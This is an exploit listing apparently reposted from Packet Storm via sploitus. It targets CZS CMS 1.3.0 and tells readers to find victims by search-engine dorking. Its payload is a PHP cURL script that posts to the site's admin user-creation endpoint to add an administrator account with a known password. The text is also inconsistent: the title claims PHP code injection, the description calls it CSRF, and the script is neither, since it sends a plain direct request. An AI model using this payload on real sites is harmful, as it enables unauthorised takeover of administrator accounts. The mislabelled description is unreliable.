Share
## https://sploitus.com/exploit?id=PACKETSTORM:212000
=============================================================================================================================================
    | # Title     : CZS CMS v 1.3.0 php code injection vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.cszcms.com                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability.
    
        (Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) .
    
    [+] Usage : php poc.php 
    
    [+] Set Target : LIne 5 
    
    [+] PayLoad :
    
    <?php
    // CSRF PoC script in PHP
    
    // Define the target URL and POST fields
    $target_url = "http://TARGETSITE/admin/users/new/add";
    $fields = [
        'name' => 'admin',
        'email' => 'admin@admin.com',
        'password' => 'pass',
        'con_password' => 'pass',
        'group' => '1',
        'pass_change' => 'yes',
        'active' => 1
    ];
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string
    
    // Execute cURL request and capture the response
    $response = curl_exec($ch);
    
    // Check for errors
    if ($response === false) {
        echo "Error: " . curl_error($ch);
    } else {
        echo "Request sent successfully!";
    }
    
    // Close cURL session
    curl_close($ch);
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================